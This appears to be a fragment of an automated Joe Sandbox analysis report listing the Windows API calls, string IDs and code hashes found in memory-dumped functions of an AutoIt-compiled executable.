• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 873a19c401ab8e3705d7d8d08611d2935782c2ea702f1aa1e1ba62741c38c0b3
• Instruction ID: f1855588b8d6db334da2d7575d7ad0c9c0b89eb5e34e7dccfd195b64532d94e5
• Opcode Fuzzy Hash: 873a19c401ab8e3705d7d8d08611d2935782c2ea702f1aa1e1ba62741c38c0b3
• Instruction Fuzzy Hash: 8161AF712087059FD310DFA4D888F6BBBE8EF59714F004919FA859B2A1DB70ED84CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001EA4D5
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001EA5E8
  • Part of subcall function 001E41CE: GetInputState.USER32 ref: 001E4225
  • Part of subcall function 001E41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001E42C0
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001EA505
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001EA5D2
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 4e94b37ca19622e75d3f8c5eb01d0a57b26818013d5715cbe342f4cb37849ddb
• Instruction ID: 72a76873c3d3efe25eb69e2c36028800d8a05a5490688e9c3cf1cd9181518435
• Opcode Fuzzy Hash: 4e94b37ca19622e75d3f8c5eb01d0a57b26818013d5715cbe342f4cb37849ddb
• Instruction Fuzzy Hash: AE41807190464AAFDF14DFA5CC49AEEBBB4FF15310F648156F809A2192DB30AE84CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• DefDlgProcW.USER32(?,?), ref: 001722EE
• GetSysColor.USER32(0000000F), ref: 001723C3
• SetBkColor.GDI32(?,00000000), ref: 001723D6
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Color$Proc
• String ID:
• API String ID: 929743424-0
• Opcode ID: 35c8471c427999714fbe09b67687edfc3996b418ba5d506e57f473c36e1e88f7
• Instruction ID: bd687df17e76fb56a73d1761bbb89b0ec420932fd814ccfa83e421fdc98cf53d
• Opcode Fuzzy Hash: 35c8471c427999714fbe09b67687edfc3996b418ba5d506e57f473c36e1e88f7
• Instruction Fuzzy Hash: A381F8F0214554BAE62D663D8C9CEBF256DEB4A300B168209F156C5697CB39CF23D236
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001F39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001F39D7
  • Part of subcall function 001F39AB: _wcslen.LIBCMT ref: 001F39F8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001F21BA
• WSAGetLastError.WSOCK32 ref: 001F21E1
• bind.WSOCK32(00000000,?,00000010), ref: 001F2238
• WSAGetLastError.WSOCK32 ref: 001F2243
• closesocket.WSOCK32(00000000), ref: 001F2272
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 28c3abc8d34713242782b8988f683396770b38c6183e78c87a0c1dd84af35dc3
• Instruction ID: 4f18647e8e7f3e853c8da446cf268182a7966ca3b4b5addb3f74508d122b3799
• Opcode Fuzzy Hash: 28c3abc8d34713242782b8988f683396770b38c6183e78c87a0c1dd84af35dc3
• Instruction Fuzzy Hash: 0B51B375600204AFD710EF64C886F6A77E5AB58718F18C098FA199F3D3DB71ED428BA1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 2749122de849489c6af4d86c5746032f3c28a8e95f61636f1085cc89ae972a49
• Instruction ID: 318a5ec2677e58187f393af2cff71ce90377c9365625bf5ced1f26a2885d33fa
• Opcode Fuzzy Hash: 2749122de849489c6af4d86c5746032f3c28a8e95f61636f1085cc89ae972a49
• Instruction Fuzzy Hash: 6321B1313113118FD7149F16D898B1A7BE9EF94314F59806AE84A8B293DB72EC56CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetUserNameW.ADVAPI32(?,?), ref: 001CE60A
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: d82902fcca0f24f35a9277df3381c1cbcb90d95afaf371d71b24a510618f5969
• Instruction ID: 64ea87cb703ce611ca7ed976240dd6efef71c9fdd70384dcc5b02c55c6655c00
• Opcode Fuzzy Hash: d82902fcca0f24f35a9277df3381c1cbcb90d95afaf371d71b24a510618f5969
• Instruction Fuzzy Hash: D4D0C9B481112DEACB94CB90EC8CDDD73BCBB14304F100155F50AE2000D73096488F10
Uniqueness

Uniqueness Score: -1.00%

APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001DEBAA
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 97e2571b0715daad9ef0b33e95da8380b839aae2c65c4b95f552aba8424288a8
• Instruction ID: e572f352bc2b77d0bc1431bfb1cafda75b01f299021ff043b2cf6efac4baed4d
• Opcode Fuzzy Hash: 97e2571b0715daad9ef0b33e95da8380b839aae2c65c4b95f552aba8424288a8
• Instruction Fuzzy Hash: 7ED0E2B61A020129E81D3A3C9D2FE360A88A301753E90824BA4039D796E6C1B9049020
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharUpperBuffW.USER32(?,?), ref: 00200C44
• _wcslen.LIBCMT ref: 00200C7E
• _wcslen.LIBCMT ref: 00200CE8
• _wcslen.LIBCMT ref: 00200D50
• _wcslen.LIBCMT ref: 00200DD4
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00200E24
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00200E63
  • Part of subcall function 0018FD60: _wcslen.LIBCMT ref: 0018FD6B
  • Part of subcall function 001D2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D2AE8
  • Part of subcall function 001D2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D2B1A
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: a177fa53af362be4b8a04a8ad276deb2198732c7676fd9d823a08951d35706d1
• Instruction ID: 6262c5bf61fb028e7578eae53e865ff61480eea3752d0e8b848b7cec023c8ce9
• Opcode Fuzzy Hash: a177fa53af362be4b8a04a8ad276deb2198732c7676fd9d823a08951d35706d1
• Instruction Fuzzy Hash: A4E19F712283428FD714EF24C49092AB3E6FFA8314F14895DF8969B6E2DB30ED55CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0017259A
• GetSystemMetrics.USER32(00000007), ref: 001725A2
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001725CD
• GetSystemMetrics.USER32(00000008), ref: 001725D5
• GetSystemMetrics.USER32(00000004), ref: 001725FA
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00172617
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00172627
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0017265A
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0017266E
• GetClientRect.USER32(00000000,000000FF), ref: 0017268C
• GetStockObject.GDI32(00000011), ref: 001726A8
• SendMessageW.USER32(00000000,00000030,00000000), ref: 001726B3
  • Part of subcall function 001719CD: GetCursorPos.USER32(?), ref: 001719E1
  • Part of subcall function 001719CD: ScreenToClient.USER32(00000000,?), ref: 001719FE
  • Part of subcall function 001719CD: GetAsyncKeyState.USER32(00000001), ref: 00171A23
  • Part of subcall function 001719CD: GetAsyncKeyState.USER32(00000002), ref: 00171A3D
• SetTimer.USER32(00000000,00000000,00000028,0017199C), ref: 001726DA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 1db12c70dff18ff512d6e0b2743b9a77f0905be8ff6d046182ad8a0583e050a6
• Instruction ID: fc0957a7faf10c0204db0b224dbc5e8c6eee57b382f6b22304304949ea85cc5d
• Opcode Fuzzy Hash: 1db12c70dff18ff512d6e0b2743b9a77f0905be8ff6d046182ad8a0583e050a6
• Instruction Fuzzy Hash: 15B18A35A01209EFDB18DFA8DC89BEE7BB4FB48314F108219FA19A7290D774E951CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 00208CB9
• _wcslen.LIBCMT ref: 00208CCD
• _wcslen.LIBCMT ref: 00208CF0
• _wcslen.LIBCMT ref: 00208D13
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00208D51
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00206551), ref: 00208DAD
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00208DE6
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00208E29
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00208E60
• FreeLibrary.KERNEL32(?), ref: 00208E6C
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00208E7C
• DestroyIcon.USER32(?,?,?,?,?,00206551), ref: 00208E8B
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00208EA8
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00208EB4
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl$Qe
• API String ID: 799131459-2048720608
• Opcode ID: 6c600a2a22b327e67a13f4fe0077969f5b53505c2654c91aef5748bcb308e845
• Instruction ID: d477384e749fb02c347b4218c1123be05615728b2642f0b9d985d04b73a1fef9
• Opcode Fuzzy Hash: 6c600a2a22b327e67a13f4fe0077969f5b53505c2654c91aef5748bcb308e845
• Instruction Fuzzy Hash: FB61DF71510316FEEB14DF64DC85BBF77A8BB18710F108606F955D60D2DBB49AA0CBA0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FCE1C
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0020DCD0,00000000,?,00000000,?,?), ref: 001FCEA3
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001FCF03
                                                                                                    • _wcslen.LIBCMT ref: 001FCF53
                                                                                                    • _wcslen.LIBCMT ref: 001FCFCE
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001FD011
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001FD120
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001FD1AC
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001FD1E0
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FD1ED
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001FD2BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: 2d71b2f69b68cf99b8718111f29ea7ea65729648ae9bff546dbd5d7c0a3f402d
                                                                                                    • Instruction ID: 30d986826d8a7dad72a022c5a5c2b273c8c17383e68312b384e2cf887851e700
                                                                                                    • Opcode Fuzzy Hash: 2d71b2f69b68cf99b8718111f29ea7ea65729648ae9bff546dbd5d7c0a3f402d
                                                                                                    • Instruction Fuzzy Hash: B81247752042059FDB14EF14C885A2ABBF6FF98714F14849CF99A9B3A2CB31ED41CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 001E4852
                                                                                                    • _wcslen.LIBCMT ref: 001E485D
                                                                                                    • _wcslen.LIBCMT ref: 001E48B4
                                                                                                    • _wcslen.LIBCMT ref: 001E48F2
                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 001E4930
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E4978
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E49B3
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E49E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                    • Opcode ID: 38dbd3cb6dc2e07756af151f24133f7f47b7242953e609bd3a10e766922e6ca7
                                                                                                    • Instruction ID: a97d43dfd42cf01ee5114c8567bfcbf9c8d6861cae6e3ca7bff6d35d669e0840
                                                                                                    • Opcode Fuzzy Hash: 38dbd3cb6dc2e07756af151f24133f7f47b7242953e609bd3a10e766922e6ca7
                                                                                                    • Instruction Fuzzy Hash: A471D2715086529FC710EF65C88096EB7F4FFA8768F10892DF896972A2EB30DD45CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 001D62BD
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001D62CF
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001D62E6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001D62FB
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001D6301
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D6311
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001D6317
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001D6338
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001D6352
                                                                                                    • GetWindowRect.USER32(?,?), ref: 001D635B
                                                                                                    • _wcslen.LIBCMT ref: 001D63C2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001D63FE
                                                                                                    • GetDesktopWindow.USER32 ref: 001D6404
                                                                                                    • GetWindowRect.USER32(00000000), ref: 001D640B
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001D6462
                                                                                                    • GetClientRect.USER32(?,?), ref: 001D646F
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 001D6494
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001D64BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    • Opcode ID: dc34c8a13648d373a3c53f7297ec3d9dae5bb6cb42b35a6686dc0e1d08d7c165
                                                                                                    • Instruction ID: a85a6256c84026a90bea3c98e878aa57b61b28bbab0d0ea63b9967f345e7fa59
                                                                                                    • Opcode Fuzzy Hash: dc34c8a13648d373a3c53f7297ec3d9dae5bb6cb42b35a6686dc0e1d08d7c165
                                                                                                    • Instruction Fuzzy Hash: 8C718D31900705EFDB20DFA8DE49BAEBBF9FF48704F10091AE586A26A0D775E944CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 001F0784
                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001F078F
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001F079A
                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001F07A5
                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001F07B0
                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001F07BB
                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001F07C6
                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 001F07D1
                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 001F07DC
                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 001F07E7
                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 001F07F2
                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 001F07FD
                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 001F0808
                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 001F0813
                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 001F081E
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 001F0829
                                                                                                    • GetCursorInfo.USER32(?), ref: 001F0839
                                                                                                    • GetLastError.KERNEL32 ref: 001F087B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215588206-0
                                                                                                    • Opcode ID: 4e94249556425a7b597972cf92ee3817aaabb991020aab17bf9e083bb1373ccc
                                                                                                    • Instruction ID: 1f9a255f6909bebc582549fcde590bccabf3270d022cba8c1a028ff48718c3d6
                                                                                                    • Opcode Fuzzy Hash: 4e94249556425a7b597972cf92ee3817aaabb991020aab17bf9e083bb1373ccc
                                                                                                    • Instruction Fuzzy Hash: 4B4146B0D043196ADB10DFB68C8986EBFE8FF08754B50452AE11DE7291DB74D901CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00190456
                                                                                                      • Part of subcall function 0019047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0024170C,00000FA0,405F30D1,?,?,?,?,001B2753,000000FF), ref: 001904AC
                                                                                                      • Part of subcall function 0019047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001B2753,000000FF), ref: 001904B7
                                                                                                      • Part of subcall function 0019047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001B2753,000000FF), ref: 001904C8
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001904DE
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001904EC
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001904FA
                                                                                                      • Part of subcall function 0019047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00190525
                                                                                                      • Part of subcall function 0019047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00190530
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00190477
                                                                                                      • Part of subcall function 00190433: __onexit.LIBCMT ref: 00190439
                                                                                                    Strings
